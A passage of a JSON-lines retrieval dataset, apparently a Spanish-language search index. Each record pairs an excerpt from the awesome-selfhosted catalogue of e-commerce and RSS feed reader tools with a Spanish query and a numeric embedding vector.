-0.03878, 0.04361, 0.05851, -0.0843, -0.01159, -0.00485, 0.01491, 0.02857, -0.05562, 0.08912, -0.03176, 0.06245, -0.02374, 0.04847, -0.07689, -0.08329, -0.00321, 0.09053, -0.00192, 0.04009, 0.01183, -0.04163, -0.03156, -0.05108, -0.05393, 0.04048, -0.0244, -0.01241, 0.01235, 0.07268, 0.02589, -0.09862, 0.01995, 0.0516, -0.03527, -0.10528, 0.03123, -0.01532, 0.00223, -0.00629, -0.04523, -0.00501, -0.06695, -0.07064, 0.0372, 0.00698, -0.05706, 0.12015, -0.0802, 0.00201, -0.10493, -0.00142, 0.02461, 0.02029, 0.02159, -0.05491, 0.01037, -0.02736, -0.07332, -0.04483, -0.01447, -0.04958, -0.04833, 0.01315, -0.09918, 0.00678, 0.02945, 0.04584, -0.01156, -0.07417, 0.05144, -0.03689, -0.00706, -0.01173, 0.03924, -0.08779, -0.04213, -0.02922, 0.00116, 0.03675, -0.00274, 0.04543, 0.01301, 0.03759, 0.04746, 0.00931, -0.06121, 0.0179, -0.01561, -0.081, 0.00413, -0.03828, -0.00991, -0.03418, 0.07031, 0.06127, -0.03364, 0.01231, 0.05414, 0.02795, -0.0372, 0.01331, -0.00547, -0.02555, -0.10583, 0.01345, -0.11403, -0.0835, -0.08503, 0.00523, -0.00575, 0.00194, 0.01123, 0.02608]} +{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: WooCommerce β€” WordPress based e-commerce solution [GPL-3.0, PHP].", "indexar": "con que puedo montar un negocio online si ya uso WordPress?", "v": [0.01471, 0.023, -0.22481, -0.12175, -0.10055, 0.03046, 0.00231, -0.11014, -0.12585, -0.20003, -0.03543, -0.10282, 0.08992, -0.05302, -0.00331, -0.02099, 0.05464, -0.02048, 0.07385, -0.00502, -0.02823, -0.14181, -0.00204, -0.04757, 0.03074, -0.02075, -0.02012, -0.08555, -0.15413, 0.10756, -0.01593, 0.05449, -0.02183, 0.03642, -0.01559, -0.00247, -0.03332, 0.09675, 0.15739, -0.04897, 0.10762, 0.00491, -0.02949, 0.12798, -0.10793, 0.05998, 0.02575, -0.17641, -0.06781, 0.05057, 0.08911, -0.08448, -0.11493, 0.08542, 0.00376, -0.00436, 0.05767, -0.07661, 0.01442, 0.08699, -0.02996, 0.09154, -0.08476, 0.05353, -0.07496, -0.00933, 0.00665, 0.10884, -0.01224, 0.04594, 0.0155, -0.0332, -0.046, -0.16039, -0.01567, 0.08298, 0.04548, 0.09338, 0.01977, -0.08861, 0.06345, -0.01963, 0.01697, 0.07943, -0.13395, -0.0662, -0.01848, -0.04812, 0.05404, 0.11487, 0.07315, 0.15015, 0.01247, -0.06935, -0.07243, -0.09823, 0.00468, -0.04923, -0.02286, 0.05003, -0.04459, 0.1041, -0.0395, 0.01627, 0.09795, -0.00555, 0.04505, -0.02888, -0.02401, -0.11275, -0.04887, 0.04351, -0.08821, 0.02248, -0.06998, -0.0506, 0.01951, 0.01021, -0.05469, 0.00293, 0.00402, 0.09101, 0.06314, -0.00289, 0.11813, 0.07249, 0.00227, 0.11884, -0.01761, -0.06107, 0.02084, -0.01563, -0.04965, 0.05177, -0.02428, 0.1144, -0.05386, 0.01688, -0.03103, -0.04137, 0.02672, -0.12529, -0.07082, -0.01917, 0.06472, 0.00735, 0.02713, -0.0877, -0.03121, 0.00813, 0.03274, 0.08488, -0.00847, 0.02704, -0.07038, 0.03899, 0.04283, -0.01114, 0.01073, 0.05302, -0.05461, 0.04116, 0.07551, 0.04071, -0.05981, -0.03592, -0.08584, 0.02245, 0.03738, -0.0202, -0.0346, 0.05463, 0.02626, -0.05055, 0.05863, 0.08295, -0.07818, 0.00456, 0.03364, -0.02456, -0.05616, -0.04571, -0.04047, 0.03903, -0.05292, 0.01794, 0.02566, 0.0609, -0.09287, 0.07067, -0.06457, -0.01925, -0.0063, -0.00458, 0.03559, -0.01049, -0.03789, 0.03834, 0.06443, -0.02755, -0.05278, -0.06067, -0.00757, 0.06271, 0.02073, -0.02846, 0.00536, 0.0219, 0.05495, 0.02175, -0.02305, -0.06562, -0.04271, -0.05047, -0.01682, -0.05053, -0.02032, -0.04247, -0.01335, 0.01194, 0.00031, 0.02579, 0.02795, 0.00578, 0.05456, 0.03508, -0.00936, -0.02648, 0.04078, 0.01708, -0.07593, -0.05225, -0.02918, 0.00767, 0.0001, -0.0644, 0.05743, 0.02271, -0.06908, 0.0256, 0.01355, 0.01924, -0.00339, -0.00724, -0.00317, -0.05248, -0.07965, 0.01684, -0.02949, -0.04628, -0.04249, 0.02851, -0.04973, -0.00991, -0.0493, 0.06518]} +{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Bubo Reader β€” Irrationally minimal RSS feed reader [MIT, Nodejs]. CommaFeed β€” Google Reader inspired self-hosted RSS reader [Apache-2.0, Java/Docker]. Feeds Fun β€” News reader with tags, scoring, and AI [BSD-3-Clause, Python]. FreshRSS β€” Self-hostable RSS feed aggregator [AGPL-3.0, PHP/Docker]. Fusion β€” Lightweight RSS aggregator and reader [MIT, Go/Docker]. Goeland β€” Turns any RSS/Atom feed into a beautiful email digest [MIT, Go/Docker]. JARR β€” JARR (Just Another RSS Reader) is a web-based news aggregator and reader (fork of Newspipe) [AGPL-3.0, Docker/Python]. Kriss Feed β€” Simple and smart (or stupid) feed reader [CC0-1.0, PHP]. Leed β€” Leed (for Light Feed) is a Free and minimalist RSS aggregator [AGPL-3.0, PHP]. Miniflux β€” Minimalist news reader [Apache-2.0, Go/deb/Docker]. NewsBlur β€” Personal news reader that brings people together to talk about the world. A new sound of an old instrument [MIT, Python]. Newspipe β€” Web news reader [AGPL-3.0, Python].", "indexar": "que programa hay para leer RSS feeds de forma minimalista y autoalojable", "v": [0.09411, -0.09671, -0.03601, -0.18859, -0.04011, -0.03528, -0.13226, 0.04239, -0.12806, 0.00964, -0.05065, -0.23445, 0.15713, 0.00317, 0.11102, -0.09668, 0.04783, -0.03182, -0.05639, -0.0703, 0.00552, 0.0049, -0.12812, -0.02835, 0.00922, 0.03657, 0.17635, -0.05387, -0.09959, 0.0592, -0.04342, 0.06629, 0.05764, -0.03274, -0.11991, 0.09702, 0.05777, 0.03985, -0.0645, 0.00474, 0.00528, 0.05094, 0.12195, 0.02516, -0.03866, 0.04091, 0.02022, 0.04949, -0.07154, 0.0552, 0.01754, 0.06117, 0.0162, 0.06981, -0.02847, -0.04063, -0.01016, -0.21368, -0.12012, 0.04493, -0.04688, 0.13292, -0.0407, -0.11326, -0.07457, 0.00838, 0.1013, 0.03588, -0.04835, -0.03511, -0.02705, -0.14927, 0.04233, 0.05697, 0.02753, 0.06235, -0.08505, 0.0945, 0.01521, 0.08714, 0.04423, -0.13362, -0.00327, 0.03304, 0.02718, 0.09969, -0.01732, 0.00728, -0.10599, 0.07442, -0.06565, 0.11967, -0.0041, 0.03061, -0.07176, -0.01578, 0.0195, -0.0289, -0.04185, -0.04319, 0.00302, -0.13617, -0.08672, 0.0577, 0.0263, -0.02403, 0.09614, 0.01914, 0.0392, 0.07954, 0.01953, -0.01342, -0.07114, -0.04681, 0.03038, 0.06204, -0.02386, -0.02068, -0.04821, -0.12444, -0.07957, 0.08391, -0.13204, 0.03414, 0.06752, 0.04631, -0.00794, 0.03579, -0.0083, 0.04578, 0.06219, 0.0297, -0.06253, -0.00445, -0.01315, -0.01351, 0.02625, 0.05986, -0.02282, -0.00057, -0.017, 0.10572, 0.08426, 0.0303, 0.0419, -0.06891, -0.00049, -0.00146, -0.02827, 0.07025, -0.06838, 0.01592, 0.00141, -0.09453, -0.06816, -0.08343, -0.02195, 0.01117, 0.00563, 0.03851, -0.04436, 0.06568, 0.02794, -0.06872, 0.03843, -0.12031, 0.11182, 0.05022, 0.02217, 0.05405, 0.01129, 0.02887, 0.00663, 0.00744, -0.01752, -0.02045, -0.00193, -0.04316, 0.04876, 0.07259, -0.05731, 0.02193, 0.05061, 0.06248, -0.01002, -0.02417, -0.05035, 0.04319, -0.03298, -0.04513, 0.00849, 0.02888, -0.00014, -0.03799, 0.07576, 0.07326, 0.03043, 0.05247, 0.0305, -0.01076, -0.07439, -0.01197, 0.06884, 0.00245, 0.0211, 0.03351, 0.05805, 0.04214, -0.01669, 0.10377, 0.04937, 0.00746, -0.01126, -0.0097, -0.01395, -0.00038, -0.0163, 0.06278, 0.04919, 0.04288, 0.00223, -0.06652, 0.02064, 0.00166, -0.02309, -0.09844, -0.03062, 0.03369, -0.02523, -0.02626, 0.04382, -0.07093, 0.01786, 0.0402, -0.02544, 0.01274, -0.05494, 0.04756, 0.01865, -0.04826, -0.05677, 0.0135, 0.08217, 0.00968, 0.006, -0.01389, -0.0082, -0.00866, -0.01355, -0.00506, 0.0164, -0.0166, -0.01511, -0.04371, 0.04238, 0.06932]} +{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Bubo Reader β€” Irrationally minimal RSS feed reader [MIT, Nodejs]. CommaFeed β€” Google Reader inspired self-hosted RSS reader [Apache-2.0, Java/Docker]. Feeds Fun β€” News reader with tags, scoring, and AI [BSD-3-Clause, Python]. FreshRSS β€” Self-hostable RSS feed aggregator [AGPL-3.0, PHP/Docker]. Fusion β€” Lightweight RSS aggregator and reader [MIT, Go/Docker]. Goeland β€” Turns any RSS/Atom feed into a beautiful email digest [MIT, Go/Docker]. JARR β€” JARR (Just Another RSS Reader) is a web-based news aggregator and reader (fork of Newspipe) [AGPL-3.0, Docker/Python]. Kriss Feed β€” Simple and smart (or stupid) feed reader [CC0-1.0, PHP]. Leed β€” Leed (for Light Feed) is a Free and minimalist RSS aggregator [AGPL-3.0, PHP]. Miniflux β€” Minimalist news reader [Apache-2.0, Go/deb/Docker]. NewsBlur β€” Personal news reader that brings people together to talk about the world. A new sound of an old instrument [MIT, Python]. Newspipe β€” Web news reader [AGPL-3.0, Python].", "indexar": "con que puedo montar un lector de noticias que tenga marcadores de tiempo", "v": [0.01632, 0.06908, -0.15931, -0.13406, -0.14635, 0.06605, -0.04068, 0.11796, -0.0849, -0.18396, 0.01692, 0.03639, 0.12169, -0.0258, 0.09447, 0.13448, 0.10781, -0.05926, 0.05626, -0.0492, 0.06513, -0.05106, -0.07989, -0.07614, 0.07398, -0.10541, 0.02731, -0.10875, -0.04677, 0.12831, -0.18648, 0.09545, 0.03431, 0.06179, -0.06816, -0.03714, 0.03974, 0.04756, -0.0167, 0.04268, 0.01442, 0.02493, -0.05978, -0.08321, -0.03501, 0.02185, -0.0487, -0.04885, -0.06608, -0.00485, 0.10469, 0.00711, -0.05808, 0.037, -0.17399, 0.06055, 0.17139, 0.1103, 0.07096, -0.08353, 0.05899, 0.1598, -0.07563, -0.0394, 0.10565, -0.04397, -0.01188, 0.0326, -0.042, -0.06292, -0.0349, -0.04522, 0.0303, 0.00902, -0.01624, 0.10113, -0.03995, -0.02372, 0.0563, 0.07714, 0.02035, -0.077, -0.06251, 0.06344, 0.05297, 0.07671, 0.0384, -0.08048, 0.01225, -0.03797, 0.02009, 0.08899, 0.05062, -0.00659, -0.01671, -0.07228, 0.08604, -0.01202, -0.01452, 0.04311, -0.00248, 0.02151, 0.0698, 0.09526, 0.0852, -0.14818, -0.05748, -0.01159, 0.13175, 0.0073, 0.04206, 0.08105, -0.13956, -0.07299, -0.09393, -0.01935, -0.00234, -0.00411, -0.03537, -0.02737, -0.04244, 0.05869, -0.05705, 0.04413, 0.06882, 0.0093, 0.1219, -0.04287, -0.02455, -0.02102, -0.03168, -0.01099, 0.00294, -0.03741, -0.10783, 0.02454, -0.04041, -0.00469, -0.03676, 0.05421, -0.02892, -0.03617, -0.04906, -0.0113, 0.01043, -0.05603, 0.01646, -0.0631, -0.10715, -0.01618, -0.03015, 0.04517, 0.06915, 0.05474, 0.0094, -0.00373, 0.08485, 0.03061, 0.05778, -0.01171, -0.05694, 0.11092, 0.00183, -0.0187, -0.01845, -0.08269, -0.00794, 0.00761, 0.13008, -0.03226, -0.11612, 0.00192, -0.00917, -0.01165, 0.07165, -0.00463, -0.0919, 0.06674, -0.01258, 0.0271, -0.00047, -0.03353, -0.04852, 0.01797, -0.03012, -0.02801, 0.00634, 0.00483, 0.01649, -0.02038, 0.03096, -0.01573, 0.05551, 0.01813, 0.05144, -0.05797, 0.01142, 0.0417, 0.05614, -0.0515, -0.05876, -0.02297, 0.02268, 0.09861, 0.02551, -0.02575, -0.04627, 0.12786, 0.05262, 0.03366, 0.05266, 0.00696, 0.01684, -0.04515, -0.01407, 0.041, 0.01782, -0.03614, -0.04476, 0.02389, 0.07469, 0.03993, 0.08802, 0.01806, -0.03719, -0.04369, 0.01734, -0.01717, 0.06036, 0.0609, -0.03282, 0.00896, -0.02296, 0.02439, -0.01099, 0.00747, 0.01494, 0.02118, 0.00473, -0.00072, 0.01953, 0.04652, 0.04534, 0.0006, -0.01318, -0.0373, -0.05833, 0.02739, -0.06042, -0.04336, 0.03893, -0.02508, 0.00148, -0.05021, 0.04978, -0.03637]} +{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: Bubo Reader β€” Irrationally minimal RSS feed reader [MIT, Nodejs]. CommaFeed β€” Google Reader inspired self-hosted RSS reader [Apache-2.0, Java/Docker]. Feeds Fun β€” News reader with tags, scoring, and AI [BSD-3-Clause, Python]. FreshRSS β€” Self-hostable RSS feed aggregator [AGPL-3.0, PHP/Docker]. Fusion β€” Lightweight RSS aggregator and reader [MIT, Go/Docker]. Goeland β€” Turns any RSS/Atom feed into a beautiful email digest [MIT, Go/Docker]. JARR β€” JARR (Just Another RSS Reader) is a web-based news aggregator and reader (fork of Newspipe) [AGPL-3.0, Docker/Python]. Kriss Feed β€” Simple and smart (or stupid) feed reader [CC0-1.0, PHP]. Leed β€” Leed (for Light Feed) is a Free and minimalist RSS aggregator [AGPL-3.0, PHP]. Miniflux β€” Minimalist news reader [Apache-2.0, Go/deb/Docker]. NewsBlur β€” Personal news reader that brings people together to talk about the world. A new sound of an old instrument [MIT, Python]. Newspipe β€” Web news reader [AGPL-3.0, Python].", "indexar": "cual es una alternativa libre a Google Reader que funcione con Docker", "v": [-0.05339, 0.03601, -0.10283, -0.01691, -0.03406, -0.07521, 0.00999, 0.04181, -0.0927, -0.1137, -0.05646, -0.21526, -0.05773, -0.08338, 0.15286, -0.12698, 0.08234, -0.10794, 0.0344, -0.00441, -0.08173, 0.02228, -0.04462, -0.16928, 0.02441, -0.06311, -0.04778, -0.0419, -0.03583, 0.03421, 0.06382, -0.05002, -0.02602, -0.08794, -0.16187, -0.01404, 0.09537, 0.06865, 0.07454, 0.00284, 0.02835, 0.02778, -0.16793, 0.11973, -0.1694, 0.03527, 0.00268, -0.00261, -0.0018, 0.06778, -0.0831, 0.03845, -0.09705, 0.05396, 0.02119, 0.12397, 0.13491, -0.13744, -0.02656, -0.0014, -0.09486, 0.03756, 0.05077, -0.07447, 0.06425, 0.00951, 0.09139, 0.07298, -0.04048, 0.07951, -0.03414, 0.03516, -0.01612, 0.04251, -0.00958, 0.16347, -0.04629, 0.00469, 1e-05, 0.09712, 0.13955, -0.08888, -0.07988, 0.01946, 0.01159, -0.08156, 0.06719, -0.20425, 0.02071, 0.03368, 0.04435, 0.0628, -0.01003, 0.14372, 0.02967, -0.05534, 0.09414, -0.05247, -0.04307, 0.0258, 0.19775, 0.02535, -0.04456, -0.01037, 0.00629, -0.07198, -0.0545, 0.02285, -0.03719, 0.00406, -0.05291, 0.00245, -0.04067, -0.02722, -0.05802, -0.01909, -0.09935, -0.00594, -0.03059, -0.03007, -0.08898, -0.01343, -0.13084, -0.03849, 0.05342, 0.09492, 0.03903, 0.05908, 0.01303, -0.05147, 0.0814, -0.04985, -0.04214, -0.07851, -0.10367, 0.08045, 0.01379, -0.03398, -0.01639, 0.02784, -0.00449, -0.00096, 0.09392, 0.01302, 0.03545, -0.02744, 0.07219, 0.01846, -0.07807, -0.07364, -0.06748, -0.00083, -0.02026, 0.08352, -0.04353, 0.00047, -0.0588, -0.01642, -0.00977, 0.08288, -0.02367, -0.07311, 0.0605, -0.01472, -0.05463, 0.00245, 0.00231, -0.03433, -0.03299, -0.04235, -0.07595, 0.02778, 0.02813, -0.05365, 0.04514, -0.02694, -0.00068, 0.0213, 0.08628, -0.00641, -0.02394, 0.02046, -0.01924, 0.0074, -0.06189, -0.08636, -0.03032, -0.05326, -0.00053, 0.03995, -0.02097, 0.03, -0.03352, -0.04527, 0.05279, -0.01864, -0.01693, -0.10035, 0.01323, -0.02549, -0.10163, -0.00611, -0.00366, 0.03106, -0.02604, 0.00684, 0.02323, 0.07119, 0.00411, 0.0289, 0.02827, -0.00556, 0.04171, 0.00936, -0.04079, 0.00927, 0.02515, -0.02098, -0.00894, -0.02118, 0.07386, -0.03172, 0.00976, 0.02442, -0.00792, -0.00983, 0.03488, 0.03089, -0.0313, 0.01592, 0.05223, -0.0031, -0.00016, 0.01827, 0.00768, 0.00558, 0.0003, 0.05684, 0.00221, -0.0312, 0.06352, 0.04043, -0.02777, 0.00142, 0.00251, 0.03, -0.09988, -0.01687, -0.01289, -0.04942, -0.03297, 0.05958, 0.01897, -0.00389, 0.03451, -0.02271]} +{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: reader β€” Feed reader web app and library (so you can use it to build your own), with only standard library and pure-Python dependencies [BSD-3-Clause, Python]. Readflow β€” Lightweight news reader with modern interface and features: full-text search, automatic categorization, archiving, offline support, notifications [AGPL-3.0, Go/Docker]. RSS-Bridge β€” Generate RSS/ATOM feeds for websites which don't have one [Unlicense, PHP/Docker]. RSS Monster β€” Easy to use web-based RSS aggregator and reader compatible with the Fever API (alternative to Google Reader) [MIT, PHP]. RSS2EMail β€” Fetches RSS/Atom-feeds and pushes new content to any email-receiver, supports OPML [GPL-2.0, Python/deb]. RSSHub β€” Easy to use, and extensible RSS feed aggregator capable of generating RSS feeds from pretty much everything ranging from social media to university departments [MIT, Nodejs/Docker]. Selfoss β€” New multipurpose rss reader, live stream, mashup, aggregation web application [GPL-3.0, PHP].", "indexar": "que programa sirve para leer noticias en formato RSS desde el navegador?", "v": [-0.09576, -0.0532, -0.06302, -0.27774, 0.00911, -0.19356, -0.0074, -0.08803, 0.01715, -0.09183, -0.0519, -0.21564, 0.05909, -0.15581, 0.04122, 0.01116, 0.08456, 0.02729, 0.08739, 0.0088, -0.01948, -0.03462, -0.00969, -0.02287, -0.02928, -0.06233, -0.07022, -0.01048, -0.0379, -0.01131, -0.05977, 9e-05, 0.03081, 0.00204, -0.13768, 0.15841, 0.15359, 0.02265, -0.1332, 0.02277, 0.02994, -0.02778, -0.01306, 0.05534, -0.00325, -0.04169, 0.02176, -0.01391, -0.02924, -0.08203, 0.08492, 0.07395, -0.00964, 0.07803, -0.055, 0.01002, 0.05802, -0.21537, -0.1299, -0.01145, 0.02669, 0.02666, -0.03319, -0.08484, -0.07011, -0.05293, 0.09305, 0.04235, -0.06812, 0.00156, -0.03911, -0.01454, 0.04266, 0.03402, -0.07352, 0.03641, -0.0585, 0.04708, 0.03668, 0.06106, 0.07976, 0.01727, -0.0428, 0.01374, -0.02257, 0.02022, 0.02571, 0.06585, -0.01045, -0.03782, 0.05199, 0.19163, -0.00057, 0.03727, 0.00461, -0.1327, 0.1222, -0.06979, 0.02675, -0.02553, -0.03649, -0.03945, -0.05907, 0.05147, 0.03223, -0.00382, 0.03402, -0.018, 0.00585, 0.13058, 0.04836, 0.0816, -0.04059, -0.02789, -0.02818, 0.03643, 0.02876, -0.06081, -0.06182, -0.0909, -0.09004, 0.09163, -0.16528, 0.04814, 0.10841, 0.06471, 0.02007, -0.01915, -0.0537, 0.0157, 0.06589, -0.02944, -0.03025, 0.0513, -0.03648, -0.08841, 0.03656, 0.04784, -0.0161, -0.02985, 0.04879, 0.05093, 0.02037, 0.06004, 0.02647, -0.10683, 0.04057, -0.02451, -0.08057, -0.08882, 0.00126, -0.03554, -0.00357, -0.04103, -0.04651, -0.03195, -0.03722, -0.03046, -0.06527, 0.09159, -0.07573, 0.04065, 0.04977, -0.0373, -0.00941, -0.10078, 0.00023, -0.00441, 0.13119, 0.09444, -0.00161, 0.03217, 0.0668, -0.09061, -0.03024, 0.00909, -0.03052, -0.00681, 0.04538, 0.01827, -0.02146, 0.00089, 0.01199, 0.04997, -0.08346, -0.07658, 0.00109, 0.00376, -0.06871, -0.05916, -0.00254, 0.00569, -0.01396, -0.04597, 0.088, -0.00097, -0.05665, -0.00902, 0.03388, -0.00185, -0.04009, 0.00171, 0.06253, 0.00219, -0.00758, 0.03342, 0.06764, -0.02238, 0.06673, 0.10886, -0.02641, 0.00518, -0.00367, 0.0105, 0.03049, -0.0451, 0.03427, 0.05157, 0.0572, 0.04446, -0.02137, -0.04626, 0.02999, 0.02717, 0.03447, -0.06803, 0.05101, -0.01875, -0.03143, 0.03762, -0.01613, 0.00357, 0.01512, 0.01433, -0.00438, -0.04091, 0.00386, 0.06041, -0.02879, -0.0549, -0.0608, 0.01893, 0.03178, 0.00352, -0.00977, -0.00982, -0.07535, 0.00519, 0.03156, -0.01121, -0.04537, 0.02846, 0.03685, -0.05561, -0.01748, 0.05574]} +{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: reader β€” Feed reader web app and library (so you can use it to build your own), with only standard library and pure-Python dependencies [BSD-3-Clause, Python]. Readflow β€” Lightweight news reader with modern interface and features: full-text search, automatic categorization, archiving, offline support, notifications [AGPL-3.0, Go/Docker]. RSS-Bridge β€” Generate RSS/ATOM feeds for websites which don't have one [Unlicense, PHP/Docker]. RSS Monster β€” Easy to use web-based RSS aggregator and reader compatible with the Fever API (alternative to Google Reader) [MIT, PHP]. RSS2EMail β€” Fetches RSS/Atom-feeds and pushes new content to any email-receiver, supports OPML [GPL-2.0, Python/deb]. RSSHub β€” Easy to use, and extensible RSS feed aggregator capable of generating RSS feeds from pretty much everything ranging from social media to university departments [MIT, Nodejs/Docker]. Selfoss β€” New multipurpose rss reader, live stream, mashup, aggregation web application [GPL-3.0, PHP].", "indexar": "con que puedo generar feeds RSS de sitios web que no los tienen propios?", "v": [-0.02349, 0.05507, -0.06353, -0.07806, 0.03873, 0.00543, -0.0268, -0.08064, -0.01594, -0.07504, -0.10076, -0.0132, 0.04434, -0.125, 0.13636, 0.00612, 0.07122, 0.03699, 0.08635, -0.09674, -0.04794, -0.07623, 0.00954, -0.00829, -0.06107, -0.06484, 0.1116, -0.03115, -0.17719, 0.08145, 0.06975, -0.00202, -0.05863, 0.02182, -0.18609, 0.03167, -0.00702, 0.18264, -0.12718, -0.10929, -0.05163, -0.00964, -0.12343, 0.03582, -0.06353, -0.00541, -0.12629, -0.08449, -0.02143, -0.03184, 0.00102, -0.04429, -0.12561, -0.00428, -0.10199, -0.00141, 0.11388, -0.18889, -0.03357, 0.10807, -0.12432, 0.13592, -0.00042, -0.05382, -0.12848, -0.0377, -0.0265, 0.10315, -0.05925, -0.02444, -0.02773, -0.01872, 0.08872, -0.01604, 0.10573, 0.04553, -0.0175, 0.11893, -0.00807, 0.09449, 0.00539, -0.1509, -0.02677, 0.01269, -0.04447, -0.00148, -0.03289, -0.05756, -0.04495, -0.06085, 0.0567, 0.09709, -0.01741, 0.00756, -0.10168, -0.09358, 0.05023, -0.02706, 0.03558, -0.0085, -0.0683, -0.06179, -0.08867, 0.03065, 0.10601, 0.0125, 0.15193, -0.07995, 0.07154, 0.02302, 0.02083, -0.00524, -0.05096, -0.05257, -0.00602, 0.04884, -0.0438, -0.11498, 0.00505, -0.04783, -0.05306, -0.0064, -0.06587, 0.03595, -0.08271, 0.03717, 0.0084, 0.04482, -0.00752, -0.02523, 0.00331, 0.0099, -0.03677, -0.00553, -0.01956, -0.01593, 0.04055, 0.04745, 0.02823, -0.00988, -0.02271, 0.02982, 0.02756, 0.03175, 0.01925, -0.02639, -0.09538, -0.05921, -0.15314, -0.03574, -0.11422, 0.01297, -0.01168, -0.03252, -0.09826, 0.03802, -0.0794, -0.05139, 0.01638, 0.0695, -0.04773, 0.05561, 0.01641, -0.00538, -0.03295, -0.00321, -0.03844, 0.06127, 0.03915, 0.05685, -0.04988, 0.05587, -0.06905, -0.09316, 6e-05, -0.01317, -0.08259, -0.01134, 0.11006, -0.00732, -0.00665, -0.01794, -0.05216, 0.05269, -0.08728, -0.03951, 0.02777, -0.01348, -0.02219, 0.07966, 0.04161, -0.01025, -0.02333, -0.00931, 0.09841, 0.0343, -0.01769, -0.01514, 0.06857, -0.06551, -0.05593, 0.01542, 0.04212, -0.02125, -0.02063, -0.00341, 0.01538, 0.00073, -0.07216, 0.04993, 0.06128, -0.00717, 0.01838, -0.09217, -0.06125, -0.05315, 0.09167, -0.06128, -0.06438, 0.01504, 0.05596, 0.01023, 0.03716, -0.00324, 0.04925, -0.01082, 0.02416, 0.01179, 0.02921, 0.05332, -0.01594, -0.00264, -0.05038, 0.00472, 0.05766, -0.01691, 0.00695, 0.02334, -0.0556, -0.03032, -0.03366, 0.0042, 0.01656, -0.04541, 0.03974, -0.09849, -0.10252, -0.02297, -0.00365, 0.00024, -0.01908, -0.05328, 0.02398, -0.00945, 0.04656, 0.00932]} +{"tipo": "pregunta", "herramienta": "Feed Readers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Feed Readers", "tema": "feed readers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Feed Readers: reader β€” Feed reader web app and library (so you can use it to build your own), with only standard library and pure-Python dependencies [BSD-3-Clause, Python]. Readflow β€” Lightweight news reader with modern interface and features: full-text search, automatic categorization, archiving, offline support, notifications [AGPL-3.0, Go/Docker]. RSS-Bridge β€” Generate RSS/ATOM feeds for websites which don't have one [Unlicense, PHP/Docker]. RSS Monster β€” Easy to use web-based RSS aggregator and reader compatible with the Fever API (alternative to Google Reader) [MIT, PHP]. RSS2EMail β€” Fetches RSS/Atom-feeds and pushes new content to any email-receiver, supports OPML [GPL-2.0, Python/deb]. RSSHub β€” Easy to use, and extensible RSS feed aggregator capable of generating RSS feeds from pretty much everything ranging from social media to university departments [MIT, Nodejs/Docker]. Selfoss β€” New multipurpose rss reader, live stream, mashup, aggregation web application [GPL-3.0, PHP].", "indexar": "cual es una alternativa ligera a Google Reader para leer mis actualizaciones?", "v": [0.03399, 0.04345, -0.02466, -0.0447, 0.03452, -0.05315, -0.06071, 0.13209, -0.15993, -0.07643, -0.05462, -0.1739, -0.00252, -0.02428, 0.22053, -0.08339, -0.0155, 0.00561, -0.00433, -0.10744, -0.025, 0.09962, -0.10361, -0.14348, -0.04593, -0.00792, -0.01662, -0.0708, 0.04129, 0.06509, -0.10604, 0.0584, -0.03286, 0.05489, -0.22093, 0.13105, 0.11105, 0.02405, -0.04514, 0.01656, 0.03644, 0.02051, -0.00609, 0.07821, -0.07811, -0.05051, 0.07468, 0.1033, -0.08188, 0.01188, -0.08721, 0.18393, -0.11637, 0.03011, 0.06279, 0.07047, 0.17331, -0.1405, -0.01403, -0.06164, -0.06221, 0.02708, 0.02209, -0.06228, 0.06068, 0.06086, -0.0077, 0.04396, -0.08106, 0.02167, -0.0252, 0.04609, -0.0121, -0.01292, -0.07621, 0.13161, 0.00914, -0.00634, 0.05233, 0.07844, 0.17736, -0.07002, -0.06403, 0.04253, -0.00232, -0.09712, 0.02607, -0.13471, 0.00996, 0.01802, -0.00457, 0.06484, -0.03677, 0.05649, 0.00976, -0.00107, 0.14475, -0.17217, -0.13624, 0.01507, 0.10879, -0.04804, 0.01642, -0.01078, -0.02889, -0.07219, -0.11417, -0.00247, -0.02497, -0.0413, -0.00784, -0.00356, -0.04195, 0.0004, 0.04448, 0.02647, -0.01522, 0.00355, -0.05043, -0.04216, -0.12501, -0.04402, -0.12465, -0.03098, 0.05642, 0.10287, 0.04076, -0.03099, 0.0342, -0.0816, 0.02599, -0.07142, -0.0003, -0.08592, -0.05685, 0.0551, 0.01986, -0.04117, -0.01634, 0.05812, 0.04517, -0.02499, 0.06414, 0.02366, 0.03865, -0.07149, 0.04593, -0.01804, -0.07197, -0.09493, -0.06731, -0.01302, 0.00663, 0.08225, -0.01324, 0.01184, -0.072, -0.00161, -0.01209, 0.07012, -0.00359, -0.04119, 0.05645, -0.03377, -0.07083, -0.0418, -0.02416, -0.0019, -0.00784, -0.02874, -0.03014, 0.02935, -0.01921, -0.00556, 0.05091, -0.01964, -0.00542, 0.03694, 0.0373, 0.01724, -0.0651, 0.04, -0.02958, 